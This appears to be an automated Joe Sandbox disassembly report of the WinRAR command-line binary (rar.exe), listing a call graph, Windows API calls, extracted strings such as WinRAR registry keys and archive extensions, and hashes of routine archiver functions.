7ff71d30a444 new 4 API calls 39486 7ff71d2b73e3 39485->39486 39488 7ff71d2b73f5 __scrt_fastfail 39486->39488 39703 7ff71d2d894c 39486->39703 39489 7ff71d2c9be0 14 API calls 39488->39489 39490 7ff71d2b1a01 39489->39490 39490->39344 39492 7ff71d2b7539 39491->39492 39729 7ff71d2e922c 39492->39729 39496 7ff71d2c6cbc 39495->39496 39499 7ff71d2c6d45 39495->39499 39501 7ff71d2c6cd9 39496->39501 39740 7ff71d2e9f78 8 API calls 2 library calls 39496->39740 39497 7ff71d2c6d83 39497->39355 39498 7ff71d2c6d69 39498->39497 39746 7ff71d2e9f78 8 API calls 2 library calls 39498->39746 39499->39497 39499->39498 39745 7ff71d2e9f78 8 API calls 2 library calls 39499->39745 39502 7ff71d2c6cf3 39501->39502 39741 7ff71d2e9f78 8 API calls 2 library calls 39501->39741 39505 7ff71d2c6d0d 39502->39505 39742 7ff71d2e9f78 8 API calls 2 library calls 39502->39742 39507 7ff71d2c6d2b 39505->39507 39743 7ff71d2e9f78 8 API calls 2 library calls 39505->39743 39507->39497 39744 7ff71d2e9f78 8 API calls 2 library calls 39507->39744 39512 7ff71d2b7162 39511->39512 39513 7ff71d2b7167 39511->39513 39747 7ff71d2b6c64 130 API calls _handle_error 39512->39747 39515->39332 39516->39324 39517->39326 39518->39334 39519->39338 39520->39336 39521->39455 39523 7ff71d2b32e9 39522->39523 39524 7ff71d2b3231 39522->39524 39523->39475 39524->39523 39571 7ff71d2c4380 14 API calls 39524->39571 39526 7ff71d2b329c 39526->39523 39572 7ff71d2d2a20 22 API calls 2 library calls 39526->39572 39529 7ff71d2c70a4 39528->39529 39531 7ff71d2c70c5 39529->39531 39573 7ff71d2d8558 10 API calls 2 library calls 39529->39573 39531->39475 39574 7ff71d2b6714 39532->39574 39534 7ff71d2b6836 39535 7ff71d2b6853 39534->39535 39585 7ff71d3148c0 39534->39585 39535->39475 39538 7ff71d2b68a9 std::bad_alloc::bad_alloc 39593 7ff71d30ba34 RtlPcToFileHeader RaiseException 39538->39593 39540 7ff71d2b68c4 39594 7ff71d2b7188 12 API calls 39540->39594 39542 7ff71d2b68eb 39542->39475 39548 7ff71d2f7a59 39543->39548 39549 7ff71d2f7a4f 39543->39549 39544 
7ff71d2f7a7c 39633 7ff71d2fb6d0 73 API calls _Init_thread_footer 39544->39633 39547 7ff71d2f7b1c 60 API calls 39547->39548 39548->39544 39548->39547 39548->39549 39601 7ff71d2f71fc 39548->39601 39634 7ff71d2c41b0 14 API calls 2 library calls 39548->39634 39549->39475 39552 7ff71d2b6ee6 39551->39552 39557 7ff71d2b6f5c 39551->39557 39675 7ff71d2f9f64 8 API calls __BuildCatchObjectHelper 39552->39675 39554 7ff71d2b6efb 39555 7ff71d2b6f2f 39554->39555 39554->39557 39555->39554 39676 7ff71d2b7188 12 API calls 39555->39676 39557->39467 39559 7ff71d2f6fb4 39558->39559 39561 7ff71d2f6f8a 39558->39561 39560 7ff71d2d4538 FindClose 39560->39561 39561->39559 39561->39560 39563 7ff71d2b5742 39562->39563 39565 7ff71d2b575d 39562->39565 39563->39565 39681 7ff71d2e3520 12 API calls 2 library calls 39563->39681 39677 7ff71d2e3610 39565->39677 39568 7ff71d2b57fc 39568->39475 39569 7ff71d2e48bc 8 API calls 39569->39568 39570->39475 39571->39526 39572->39523 39573->39529 39575 7ff71d2b6738 39574->39575 39584 7ff71d2b67a7 __BuildCatchObjectHelper 39574->39584 39576 7ff71d2b6765 39575->39576 39595 7ff71d2cca6c 48 API calls 3 library calls 39575->39595 39579 7ff71d2b6786 39576->39579 39581 7ff71d2b67e1 39576->39581 39578 7ff71d2b6759 39596 7ff71d2ccb64 8 API calls 39578->39596 39579->39584 39597 7ff71d2ccb64 8 API calls 39579->39597 39581->39584 39598 7ff71d2ccb64 8 API calls 39581->39598 39584->39534 39586 7ff71d3148f5 39585->39586 39589 7ff71d2b684b 39585->39589 39586->39589 39599 7ff71d317094 31 API calls 2 library calls 39586->39599 39588 7ff71d314924 39588->39589 39590 7ff71d31492d 39588->39590 39589->39535 39589->39538 39600 7ff71d314e3c 16 API calls abort 39590->39600 39593->39540 39594->39542 39595->39578 39599->39588 39608 7ff71d2f7217 setbuf 39601->39608 39602 7ff71d2f73c5 39641 7ff71d2d45cc 39602->39641 39603 7ff71d30a610 _handle_error 8 API calls 39605 7ff71d2f776f 39603->39605 39605->39548 39607 7ff71d2f729c 39619 7ff71d2f73bb 39607->39619 39621 7ff71d2f732e 39607->39621 
39608->39602 39608->39607 39627 7ff71d2f725a 39608->39627 39648 7ff71d2d4554 39608->39648 39609 7ff71d2f7453 39612 7ff71d2f7476 39609->39612 39613 7ff71d2f7464 39609->39613 39611 7ff71d2f76ef 39611->39627 39659 7ff71d2d8558 10 API calls 2 library calls 39611->39659 39629 7ff71d2f7496 39612->39629 39645 7ff71d2d4538 39612->39645 39656 7ff71d2f7c38 55 API calls 3 library calls 39613->39656 39614 7ff71d2f7342 39614->39611 39614->39627 39630 7ff71d2f7656 39614->39630 39657 7ff71d2c4380 14 API calls 39614->39657 39617 7ff71d2f7471 39617->39612 39635 7ff71d30a444 39619->39635 39621->39614 39623 7ff71d2f734a 39621->39623 39624 7ff71d2f737e 39623->39624 39623->39627 39654 7ff71d2c4380 14 API calls 39623->39654 39624->39627 39655 7ff71d2ccbd0 75 API calls 39624->39655 39625 7ff71d2d4554 16 API calls 39625->39627 39627->39603 39629->39625 39629->39627 39630->39611 39630->39627 39630->39630 39631 7ff71d2f7723 39630->39631 39658 7ff71d2bc214 8 API calls 2 library calls 39631->39658 39634->39548 39638 7ff71d30a44f 39635->39638 39636 7ff71d30a47a 39636->39602 39637 7ff71d3136c0 new 2 API calls 39637->39638 39638->39636 39638->39637 39660 7ff71d30b314 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 39638->39660 39661 7ff71d30b2f4 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 39638->39661 39644 7ff71d2d45ed 39641->39644 39642 7ff71d2d46b2 39642->39609 39642->39614 39643 7ff71d2d46ec 15 API calls 39643->39644 39644->39642 39644->39643 39646 7ff71d2d454f 39645->39646 39647 7ff71d2d4549 FindClose 39645->39647 39646->39629 39647->39646 39649 7ff71d2d4570 39648->39649 39653 7ff71d2d4574 39649->39653 39662 7ff71d2d46ec 39649->39662 39652 7ff71d2d458d FindClose 39652->39653 39653->39607 39654->39624 39655->39627 39656->39617 39657->39630 39658->39627 39659->39627 39663 7ff71d2d4705 setbuf 39662->39663 39664 7ff71d2d4733 FindFirstFileW 39663->39664 39665 7ff71d2d47a4 FindNextFileW 39663->39665 39667 7ff71d2d4749 39664->39667 
39674 7ff71d2d478b 39664->39674 39666 7ff71d2d47ae GetLastError 39665->39666 39665->39674 39666->39674 39668 7ff71d2e4534 10 API calls 39667->39668 39669 7ff71d2d475b 39668->39669 39671 7ff71d2d475f FindFirstFileW 39669->39671 39672 7ff71d2d477a GetLastError 39669->39672 39670 7ff71d30a610 _handle_error 8 API calls 39673 7ff71d2d4587 39670->39673 39671->39672 39671->39674 39672->39674 39673->39652 39673->39653 39674->39670 39675->39554 39676->39555 39679 7ff71d2e3626 setbuf wcschr 39677->39679 39678 7ff71d30a610 _handle_error 8 API calls 39680 7ff71d2b57e1 39678->39680 39679->39678 39680->39568 39680->39569 39681->39565 39683 7ff71d2c8919 39682->39683 39708 7ff71d2f4b14 39683->39708 39685 7ff71d2c8954 __scrt_fastfail 39685->39480 39687 7ff71d2e9199 39686->39687 39688 7ff71d30a480 4 API calls 39687->39688 39689 7ff71d2e91be 39688->39689 39690 7ff71d30a444 new 4 API calls 39689->39690 39691 7ff71d2e91cf 39690->39691 39692 7ff71d2e91e1 39691->39692 39693 7ff71d2c88dc 8 API calls 39691->39693 39694 7ff71d30a444 new 4 API calls 39692->39694 39693->39692 39695 7ff71d2e91f7 39694->39695 39696 7ff71d2e9209 39695->39696 39697 7ff71d2c88dc 8 API calls 39695->39697 39696->39482 39697->39696 39699 7ff71d2c88dc 8 API calls 39698->39699 39700 7ff71d2e7063 39699->39700 39701 7ff71d2e72c0 4 API calls 39700->39701 39702 7ff71d2b7325 39701->39702 39702->39485 39702->39488 39713 7ff71d2f7d80 39703->39713 39709 7ff71d2f4b26 39708->39709 39710 7ff71d2f4b2b 39708->39710 39712 7ff71d2f4b38 8 API calls _handle_error 39709->39712 39710->39685 39712->39710 39720 7ff71d2f8094 39713->39720 39716 7ff71d2d8a44 39717 7ff71d2d8a5a __scrt_fastfail 39716->39717 39724 7ff71d2fbac4 39717->39724 39721 7ff71d2f809f 39720->39721 39722 7ff71d2f7ec8 68 API calls 39721->39722 39723 7ff71d2d896e 39722->39723 39723->39716 39727 7ff71d2fba70 GetCurrentProcess GetProcessAffinityMask 39724->39727 39728 7ff71d2d89c5 39727->39728 39728->39488 39732 7ff71d2e9245 39729->39732 39731 7ff71d2e92b1 39738 7ff71d2d6194 
72 API calls 39731->39738 39737 7ff71d2d6194 72 API calls 39732->39737 39734 7ff71d2e92bd 39739 7ff71d2d6194 72 API calls 39734->39739 39736 7ff71d2e92c9 39737->39731 39738->39734 39739->39736 39740->39501 39741->39502 39742->39505 39743->39507 39744->39499 39745->39498 39746->39497 39747->39513 39748 7ff71d312450 39755 7ff71d313734 39748->39755 39750 7ff71d312455 39751 7ff71d316998 fflush LeaveCriticalSection 39750->39751 39752 7ff71d312460 39751->39752 39753 7ff71d31246c 39752->39753 39754 7ff71d312488 11 API calls 39752->39754 39754->39753 39760 7ff71d315630 GetLastError 39755->39760 39757 7ff71d31373f 39780 7ff71d314a1c 35 API calls abort 39757->39780 39761 7ff71d315652 39760->39761 39762 7ff71d31564d 39760->39762 39767 7ff71d31569b 39761->39767 39782 7ff71d314b14 15 API calls 3 library calls 39761->39782 39781 7ff71d316cf4 6 API calls __vcrt_uninitialize_ptd 39762->39781 39765 7ff71d315669 39766 7ff71d315671 39765->39766 39783 7ff71d316d4c 6 API calls __vcrt_uninitialize_ptd 39765->39783 39772 7ff71d314a74 __free_lconv_mon 15 API calls 39766->39772 39769 7ff71d3156a0 SetLastError 39767->39769 39770 7ff71d3156b6 SetLastError 39767->39770 39769->39757 39785 7ff71d314a1c 35 API calls abort 39770->39785 39775 7ff71d315678 39772->39775 39773 7ff71d315688 39773->39766 39776 7ff71d31568f 39773->39776 39775->39770 39784 7ff71d3153e0 15 API calls _invalid_parameter_noinfo 39776->39784 39778 7ff71d315694 39779 7ff71d314a74 __free_lconv_mon 15 API calls 39778->39779 39779->39767 39781->39761 39782->39765 39783->39773 39784->39778 39786 7ff71d319c74 39787 7ff71d319c7c 39786->39787 39788 7ff71d319cbb 39787->39788 39789 7ff71d319cac 39787->39789 39790 7ff71d319cc5 39788->39790 39808 7ff71d31ce08 32 API calls 2 library calls 39788->39808 39807 7ff71d314f3c 15 API calls _invalid_parameter_noinfo 39789->39807 39795 7ff71d314b8c 39790->39795 39794 7ff71d319cb1 __scrt_fastfail 39796 7ff71d314bab 39795->39796 39797 7ff71d314ba1 39795->39797 39798 7ff71d314bb0 39796->39798 39805 
7ff71d314bb7 __vcrt_getptd_noexit 39796->39805 39799 7ff71d314ab4 setbuf 16 API calls 39797->39799 39800 7ff71d314a74 __free_lconv_mon 15 API calls 39798->39800 39803 7ff71d314ba9 39799->39803 39800->39803 39801 7ff71d314bf6 39809 7ff71d314f3c 15 API calls _invalid_parameter_noinfo 39801->39809 39803->39794 39804 7ff71d314be0 RtlReAllocateHeap 39804->39803 39804->39805 39805->39801 39805->39804 39806 7ff71d3136c0 new 2 API calls 39805->39806 39806->39805 39807->39794 39808->39790 39809->39803 39810 7ff71d2b7a5b 39811 7ff71d2b7a60 39810->39811 39812 7ff71d2c9be0 14 API calls 39811->39812 39814 7ff71d2b7af7 39811->39814 39812->39814 39813 7ff71d2b7bda 39816 7ff71d2bb540 147 API calls 39813->39816 39814->39813 39843 7ff71d2d1e1c GetFileTime 39814->39843 39817 7ff71d2b7bf8 39816->39817 39820 7ff71d2b7c3e 39817->39820 39844 7ff71d309b98 216 API calls 3 library calls 39817->39844 39819 7ff71d2bb540 147 API calls 39821 7ff71d2b7c9c 39819->39821 39820->39819 39842 7ff71d2b7f89 39821->39842 39845 7ff71d2d6378 39821->39845 39823 7ff71d2b7cd7 39824 7ff71d2d6378 4 API calls 39823->39824 39826 7ff71d2b7cf3 39824->39826 39825 7ff71d2b7e4e 39856 7ff71d2b1204 48 API calls 39825->39856 39828 7ff71d2b7d59 39826->39828 39829 7ff71d2b7d38 39826->39829 39840 7ff71d2b7de1 39826->39840 39830 7ff71d30a444 new 4 API calls 39828->39830 39831 7ff71d30a444 new 4 API calls 39829->39831 39835 7ff71d2b7d42 std::bad_alloc::bad_alloc 39830->39835 39831->39835 39833 7ff71d2b7eb3 39836 7ff71d2b7edb 39833->39836 39857 7ff71d2e9680 39833->39857 39835->39840 39849 7ff71d30ba34 RtlPcToFileHeader RaiseException 39835->39849 39863 7ff71d2d6424 8 API calls _handle_error 39836->39863 39839 7ff71d2b7f56 39841 7ff71d2bb540 147 API calls 39839->39841 39840->39825 39850 7ff71d2e98dc 39840->39850 39841->39842 39843->39813 39844->39820 39846 7ff71d2d6396 39845->39846 39848 7ff71d2d63a0 39845->39848 39847 7ff71d30a444 new 4 API calls 39846->39847 39847->39848 39848->39823 39849->39840 39851 7ff71d2e9926 
39850->39851 39852 7ff71d2e993c 39850->39852 39854 7ff71d2c90b8 75 API calls 39851->39854 39853 7ff71d2c90b8 75 API calls 39852->39853 39855 7ff71d2e9934 39853->39855 39854->39855 39855->39825 39856->39833 39861 7ff71d2e96a4 39857->39861 39858 7ff71d2e97d7 39859 7ff71d2d2574 126 API calls 39859->39861 39861->39858 39861->39859 39862 7ff71d309b98 216 API calls 39861->39862 39864 7ff71d2d6498 72 API calls new 39861->39864 39862->39861 39863->39839 39864->39861
Strings
Memory Dump Source
• Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
• Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
Similarity
• API ID:
• String ID: *.%ls$*?.$+$7z;ace;arj;bz2;cab;gz;jpeg;jpg;lha;lz;lzh;mp3;rar;taz;tgz;xz;z;zip;zipx$EML$ERR$LOG$NUL$OFF$SFX$SND$VER$default.sfx$rar.log$stdin$stdin
• API String ID: 0-1628410872
• Opcode ID: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
• Instruction ID: ec20bcf4e63f26e22b1655b69dd3441846af403096a98eb0ab2caa77f73b0000
• Instruction Fuzzy Hash: D9C2D43292C98281EA34BB2481442BDB691AF057B5FD84535CA2E472E5FE6DFD4CCB70
Similarity
• API ID:
• String ID: %s%s $.ext$exe$rar$sfx$,6$BK$q:
• API String ID: 0-1660254149
• Opcode ID: eefc6d35d2847cea84a00b3f56c99ccad538a181ac11d2ce23a6cc3b2c6d100e
• Instruction ID: 137886874a5a7ae508126f286a65984c19f8d22f35b54bcdcb8d7b1933d33440
• Instruction Fuzzy Hash: 6FE2C422A0CFC285EB20EF25C4801FDA7A1FB497A8F954135CA6D07796EF79D648CB10
                                                            Similarity
                                                            • API ID: Library$Load$FileFreeModuleNameVersion
                                                            • String ID: rarlng.dll
                                                            • API String ID: 2520153904-1675521814

                                                            Control-flow Graph

                                                            APIs
                                                            • FindFirstFileW.KERNELBASE(?,?,00000000,?,?,00007FF71D2D4620,?,00000000,?,00007FF71D2F7A8C), ref: 00007FF71D2D4736
                                                            • FindFirstFileW.KERNEL32(?,00000000,?,?,00007FF71D2D4620,?,00000000,?,00007FF71D2F7A8C), ref: 00007FF71D2D476B
                                                            • GetLastError.KERNEL32(?,00000000,?,?,00007FF71D2D4620,?,00000000,?,00007FF71D2F7A8C), ref: 00007FF71D2D477A
                                                            • FindNextFileW.KERNELBASE(?,?,00000000,?,?,00007FF71D2D4620,?,00000000,?,00007FF71D2F7A8C), ref: 00007FF71D2D47A4
                                                            • GetLastError.KERNEL32(?,00000000,?,?,00007FF71D2D4620,?,00000000,?,00007FF71D2F7A8C), ref: 00007FF71D2D47B2
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: FileFind$ErrorFirstLast$Next
                                                            • String ID:
                                                            • API String ID: 869497890-0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: Crypt$Context$AcquireRandomRelease
                                                            • String ID:
                                                            • API String ID: 1815803762-0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: Char
                                                            • String ID:
                                                            • API String ID: 751630497-0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: FileModuleNamesnprintfwcschr
                                                            • String ID: ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS$\
                                                            • API String ID: 602362809-1645646101

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: wcschr
                                                            • String ID: .part$.rar$.rar$AFUMD$FUADPXETK$stdin
                                                            • API String ID: 1497570035-1281034975

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$CallerCurrentDirectoryProcessSystem
                                                            • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                            • API String ID: 1389829785-2207617598
                                                            • Opcode ID: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
                                                            • Instruction ID: 7db2b4eb0564b9841800557f776e2d4546f97801aff8064b4798507016469114
                                                            • Opcode Fuzzy Hash: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
                                                            • Instruction Fuzzy Hash: 98414D31A0CE9681EA55AB12A800579EB61BF45BF4FC80639CD6D07754FE7CE44E9B20

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterPresentUnhandled__scrt_fastfail__scrt_is_nonwritable_in_current_image$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual__isa_available_init__scrt_acquire_startup_lock__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock__scrt_uninitialize_crt__vcrt_initialize
                                                            • String ID:
                                                            • API String ID: 552178382-0
                                                            • Opcode ID: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
                                                            • Instruction ID: 809a46300f31bc07be8e5ce3eff174d836e292f4b08926a2f16eb7550bc2511e
                                                            • Opcode Fuzzy Hash: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
                                                            • Instruction Fuzzy Hash: D2310631E0CA43C2EA18BF24A4523B9E391AF557A4FC4403CEA5D476D7FE2CA40D8A60

                                                            Control-flow Graph

                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,00007FF71D2F495D,?,?,?,00007FF71D2E7E7D), ref: 00007FF71D2F47DB
                                                            • RegQueryValueExW.ADVAPI32(?,?,?,?,?,00007FF71D2F495D,?,?,?,00007FF71D2E7E7D), ref: 00007FF71D2F4831
                                                            • ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,00007FF71D2F495D,?,?,?,00007FF71D2E7E7D), ref: 00007FF71D2F4853
                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,00007FF71D2F495D,?,?,?,00007FF71D2E7E7D), ref: 00007FF71D2F48A6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: CloseEnvironmentExpandOpenQueryStringsValue
                                                            • String ID: LanguageFolder$Software\WinRAR\General
                                                            • API String ID: 1800380464-3408810217
                                                            • Opcode ID: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
                                                            • Instruction ID: 71ce63fa2a91c49f0e8a9f76fe4fcc923ba0a6a9aa390d0bb43a625c4a7477fa
                                                            • Opcode Fuzzy Hash: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
                                                            • Instruction Fuzzy Hash: 9E318022A1CE8185EA60AB21E8502EAE351FF847A4F804635EE5D47B99FE6CD14DCB10

                                                            Control-flow Graph

                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(?,?,?,?,00000800,00000000,00000000,00007FF71D2E38CB,?,?,?,00007FF71D2E41EC), ref: 00007FF71D2E43D1
                                                            • RegQueryValueExW.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF71D2E38CB,?,?,?,00007FF71D2E41EC), ref: 00007FF71D2E4402
                                                            • RegCloseKey.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF71D2E38CB,?,?,?,00007FF71D2E41EC), ref: 00007FF71D2E440D
                                                            • GetModuleFileNameW.KERNEL32(?,?,?,?,00000800,00000000,00000000,00007FF71D2E38CB,?,?,?,00007FF71D2E41EC), ref: 00007FF71D2E443E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: CloseFileModuleNameOpenQueryValue
                                                            • String ID: AppData$Software\WinRAR\Paths
                                                            • API String ID: 3617018055-3415417297
                                                            • Opcode ID: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
                                                            • Instruction ID: 3359017ad99a4ecb2638667b615df3e63b2d540e0093da2ff3edeb641645c3c8
                                                            • Opcode Fuzzy Hash: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
                                                            • Instruction Fuzzy Hash: 00115132A1CB4185EA10AF26E4005A9F361FF88BA4F845135EA5E07655FF3CE109CB10

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: H9
                                                            • API String ID: 0-2207570329
                                                            • Opcode ID: 6c7bc826278d7ea269c3741db8a1faab47c2ba2902a6fc586a2818d3bcdcd0b2
                                                            • Instruction ID: 8b27c9337bd328f6f8229e5451ff44aa7f59f43c2347437dace20874b5d2ec29
                                                            • Opcode Fuzzy Hash: 6c7bc826278d7ea269c3741db8a1faab47c2ba2902a6fc586a2818d3bcdcd0b2
                                                            • Instruction Fuzzy Hash: C3E1C062A0CF9285EB10EB25E044AFDA3A5EB4975CF894535CE5D03785EF78E648CB20

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastWrite$Handle
                                                            • String ID:
                                                            • API String ID: 3350704910-0
                                                            • Opcode ID: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
                                                            • Instruction ID: aceb63b23cea0b3a2378316d3a96d63ee348c74f5bfa895d6c896433274085d2
                                                            • Opcode Fuzzy Hash: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
                                                            • Instruction Fuzzy Hash: CF519636A0CE5187EA24EF25E46437AE360FF45BA4F840135DB5E47A60EF3CE549CA60

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: File$CreateErrorLast$Time
                                                            • String ID:
                                                            • API String ID: 1999340476-0

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: swprintf
                                                            • String ID: rar.ini$switches=$switches_%ls=
                                                            • API String ID: 233258989-2235180025

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: AddressHandleModuleProcsetbuf$ErrorLibraryLoadModeVersion
                                                            • String ID: rar.lng
                                                            • API String ID: 553376247-2410228151

                                                            Control-flow Graph

                                                            APIs
                                                            • SHGetMalloc.SHELL32(?,00000800,?,00007FF71D2E4432,?,?,?,?,00000800,00000000,00000000,00007FF71D2E38CB,?,?,?,00007FF71D2E41EC), ref: 00007FF71D2E40C4
                                                            • SHGetSpecialFolderLocation.SHELL32(?,?,?,?,00000800,00000000,00000000,00007FF71D2E38CB,?,?,?,00007FF71D2E41EC), ref: 00007FF71D2E40DF
                                                            • SHGetPathFromIDListW.SHELL32 ref: 00007FF71D2E40F1
                                                              • Part of subcall function 00007FF71D2D3458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF71D2E413F,?,?,?,?,00000800,00000000,00000000,00007FF71D2E38CB,?,?,?,00007FF71D2E41EC), ref: 00007FF71D2D34A0
                                                              • Part of subcall function 00007FF71D2D3458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF71D2E413F,?,?,?,?,00000800,00000000,00000000,00007FF71D2E38CB,?,?,?,00007FF71D2E41EC), ref: 00007FF71D2D34D5
                                                            Strings
                                                            Similarity
                                                            • API ID: CreateDirectory$FolderFromListLocationMallocPathSpecial
                                                            • String ID: WinRAR
                                                            • API String ID: 977838571-3970807970
                                                            APIs
